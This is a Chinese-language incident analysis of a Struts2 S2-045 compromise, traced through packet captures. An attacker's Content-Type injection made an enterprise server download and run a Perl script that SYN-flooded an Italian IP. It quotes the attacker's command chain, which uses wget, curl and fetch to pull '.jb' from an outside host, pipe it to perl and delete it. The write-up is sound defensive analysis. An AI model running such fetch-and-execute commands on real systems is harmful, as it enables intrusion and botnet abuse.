从数据包视角解析新型Struts2漏洞攻击全过程

本文涉及的产品
云解析 DNS,旗舰版 1个月
全局流量管理 GTM,标准版 1个月
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
简介: 本文讲的是从数据包视角解析新型Struts2漏洞攻击全过程,万年漏洞王 Struts2作为世界上最流行的 Java Web 服务器框架之一,已经被炒得沸沸扬扬,其原因是由于 Apache Struts2 的 Jakarta Multipart parser 插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改 HTTP 请求头中的 Content-Type 值来触发该漏洞,导致远程执行代码。

本文讲的是从数据包视角解析新型Struts2漏洞攻击全过程,万年漏洞王 Struts2作为世界上最流行的 Java Web 服务器框架之一,已经被炒得沸沸扬扬,其原因是由于 Apache Struts2 的 Jakarta Multipart parser 插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改 HTTP 请求头中的 Content-Type 值来触发该漏洞,导致远程执行代码。

image

新的漏洞出现,必然会存在漏洞利用的情况,如果在没有升级和打补丁的情况下已被攻击,即使漏洞得到修复仍有潜在风险,那么如何判断是否已经被攻击了呢?本文通过数据包视角,基于网络回溯分析技术,针对最近新型Struts2漏洞攻击行为典型事件进行深层解析,打破传统思维模式,提供解决未知问题的新思路。

  1. 问题描述

科来针对本次struts2漏洞为用户进行网络安全分析服务,在与某中国500强企业集团公司安全运维人员沟通时了解到该企业互联网出口防火墙CPU利用率持续保持在80%左右,而且涌现出关于内部服务器*.35大量告警日志,防火墙高负载工作导致服务器网络缓慢。由于该服务器上承载着大量公司核心业务,造成了严重影响。

通过在该集团公司内网的核心交换机上的网络回溯分析系,进行7*24小时全流量监控(其工作模式可以简单理解为部署在大型网络环境中的“行车记录仪”),并通过该系统还原事件发生过程,回溯分析可疑流量数据。

  1. 分析过程

防火墙高负载与.35服务器有关,所以重点回溯分析.35地址。问题服务器*.35一天多的时间共产生未知TCP应用流量47.48G,其中与意大利IP 62.149.175.81通讯流量达到44.21GB,行为极为可疑。

image

回溯分析.35与意大利IP会话通讯。两者之间通讯流量平稳(达6Mbps左右),任取一段时间,可以看到.35与62.149.175.81:8080每条TCP会话客户端数据包数、服务器数据包数一致,状态均显示连接被重置,平均包长71字节,综合这些特征,怀疑*.35发动SYN Flood攻击。
image

如下,.35 向62.149.175.81发送SYN,后者快速回复RST的数据包,时间差不足1ms,推测为出口防火墙阻断保护(因为后者位于意大利,所以后者真是返回RST数据包时间差应大于50ms),.35发出的SYN数量极多同时频率极高现象,基本断定*.35发动了SYN Flood攻击。

image

小结:由于*.35发动了SYN Flood攻击,极高频率地发送了大量的SYN包,防火墙对每个SYN包都需要进行处理,严重消耗了出口防火墙性能,影响了正常业务通讯。

为了更深入找到*.35发动SYN Flood的原因,提取了该服务器发动攻击前的流量深入分析。

香港IP 223.255.145.158尝试利用Struts2漏洞攻击(在Content-type: 中插入非法字符串来远程执行命令并尝试执行该脚本,执行完成后删除),执行的脚本信息为:

wget -qO – http://65.254.63.20/.jb | perl ;
cd /tmp ;
curl -O http://65.254.63.20/.jb ;
fetch http://65.254.63.20/.jb ;
perl .jb ;
rm -rf .jb*,即问题服务器向65.254.63.20 get请求.jb文件。
image

进一步分析,我们发现问题服务器*.35确实下载获取到.jb文件。真实脚本为per1,可以看到62.149.175.81(SYN Flood目标IP)及端口8080。综合上文分析,基本上可以判定被黑客(所用IP 223.255.145.158)通过Struts2漏洞攻击入侵后,执行命令向美国IP 65.254.63.20请求下载了.jb文件,并执行了per1脚本SYN Flood攻击62.149.175.81.

image

  1. 分析结论

通过以上分析,我们发现本次安全事件是黑客通过Struts2的S2-045漏洞,远程向问题服务器执行恶意代码,导致服务器主动下载脚本并成为肉鸡实施SYN Flood攻击,科来立即告知该企业相关工作人员并建议尽快修复其漏洞。

  1. 价值

该漏洞影响范围极广,涉及Struts 2.3.5 – Struts 2.3.31, Struts 2.5 – Struts 2.5.10多个版本。黑客可以利用该漏洞通过浏览器在远程服务器上执行任意系统命令,将会对受影响站点造成严重影响,引发数据泄露、网页篡改、植入后门、成为肉鸡等安全事件。可将版本更新至Struts 2.3.32 或者 Struts 2.5.10.1。

本案例中,我们通过全流量分析判定了入侵者对网络及服务器的攻击行为,帮助用户发现网络中存在的安全隐患,掌握黑客攻击的手段,进而快速采取相应的防范措施。

当今企业级客户的业务系统日趋复杂,同时运行实时性要求越来越高,有效提升用户的运维主动性和分析处理问题效率已迫在眉睫。通过网络回溯分析技术可以完整记录网络原始流量,提升对异常网络行为的运行态势感知能力。

原文发布时间为:三月 15, 2017
本文作者:nana
本文来自云栖社区合作伙伴安全牛,了解相关信息可以关注安全牛
原文链接:http://www.aqniu.com/threat-alert/23557.html

相关文章
|
1月前
|
SQL 安全 算法
网络安全与信息安全的全面解析:应对漏洞、加密技术及提升安全意识的策略
本文深入探讨了网络安全和信息安全的重要性,详细分析了常见的网络安全漏洞以及其利用方式,介绍了当前流行的加密技术及其应用,并强调了培养良好安全意识的必要性。通过综合运用这些策略,可以有效提升个人和企业的网络安全防护水平。
|
14天前
|
域名解析 网络协议 安全
什么是DNS劫持攻击以及如何避免此类攻击
【10月更文挑战第28天】DNS劫持攻击是一种网络攻击方式,攻击者通过篡改用户的DNS设置,将合法网站的域名解析为恶意网站的IP地址,使用户在不知情的情况下访问钓鱼网站。攻击手段包括在用户系统植入恶意软件、利用路由器漏洞或破解DNS通信等。为防止此类攻击,应使用安全软件、定期检查DNS设置、重置路由器密码及避免访问不安全的网站。
66 1
|
6天前
|
SQL 安全 网络安全
网络安全的护城河:漏洞防御与加密技术的深度解析
【10月更文挑战第37天】在数字时代的浪潮中,网络安全成为守护个人隐私与企业资产的坚固堡垒。本文将深入探讨网络安全的两大核心要素——安全漏洞和加密技术,以及如何通过提升安全意识来强化这道防线。文章旨在揭示网络攻防战的复杂性,并引导读者构建更为稳固的安全体系。
17 1
|
14天前
|
SQL 安全 测试技术
网络安全的盾牌与剑——漏洞防御与加密技术解析
【10月更文挑战第28天】 在数字时代的浪潮中,网络空间安全成为我们不可忽视的战场。本文将深入探讨网络安全的核心问题,包括常见的网络安全漏洞、先进的加密技术以及提升个人和组织的安全意识。通过实际案例分析和代码示例,我们将揭示黑客如何利用漏洞进行攻击,展示如何使用加密技术保护数据,并强调培养网络安全意识的重要性。让我们一同揭开网络安全的神秘面纱,为打造更加坚固的数字防线做好准备。
35 3
|
1月前
|
SQL 安全 网络安全
网络安全的盾牌与利剑:漏洞防御与加密技术解析
【10月更文挑战第3天】在数字化浪潮中,网络安全成为保障信息资产的关键防线。本文将深入探讨网络安全中的两大核心议题:网络漏洞防御和加密技术。我们将从基础概念出发,逐步分析漏洞产生的原因、影响及防范措施,并详细解读加密技术的工作原理和应用实例。文章旨在通过理论与实践的结合,增强读者的安全意识和技能,为构建更加稳固的网络环境提供实用指南。
42 1
|
4天前
|
存储 缓存 网络协议
如何防止DNS缓存中毒攻击(一)
DNS缓存中毒也称为DNS欺骗
25 10
|
19天前
|
缓存 监控 网络协议
一文带你了解10大DNS攻击类型,收藏!
【10月更文挑战第23天】
133 1
一文带你了解10大DNS攻击类型,收藏!
|
22天前
|
存储 安全 网络安全
网络安全的屏障与钥匙:漏洞防御与加密技术深度解析
【10月更文挑战第20天】在数字世界的迷宫中,网络安全是守护我们数据宝藏的坚固盾牌和锋利钥匙。本篇文章将带您穿梭于网络的缝隙之间,揭示那些潜藏的脆弱点—网络安全漏洞,同时探索如何通过现代加密技术加固我们的数字堡垒。从基本概念到实战策略,我们将一同揭开网络安全的神秘面纱,提升您的安全意识,保护个人信息不受侵犯。
51 25
|
17天前
|
安全 前端开发 Java
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第26天】Web安全是现代软件开发的重要领域,本文深入探讨了XSS和CSRF两种常见攻击的原理及防御策略。针对XSS,介绍了输入验证与转义、使用CSP、WAF、HTTP-only Cookie和代码审查等方法。对于CSRF,提出了启用CSRF保护、设置CSRF Token、使用HTTPS、二次验证和用户教育等措施。通过这些策略,开发者可以构建更安全的Web应用。
52 4
|
16天前
|
安全 Go PHP
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第27天】本文深入解析了Web安全中的XSS和CSRF攻击防御策略。针对XSS,介绍了输入验证与净化、内容安全策略(CSP)和HTTP头部安全配置;针对CSRF,提出了使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie等方法,帮助开发者有效保护网站和用户数据安全。
44 2

推荐镜像

更多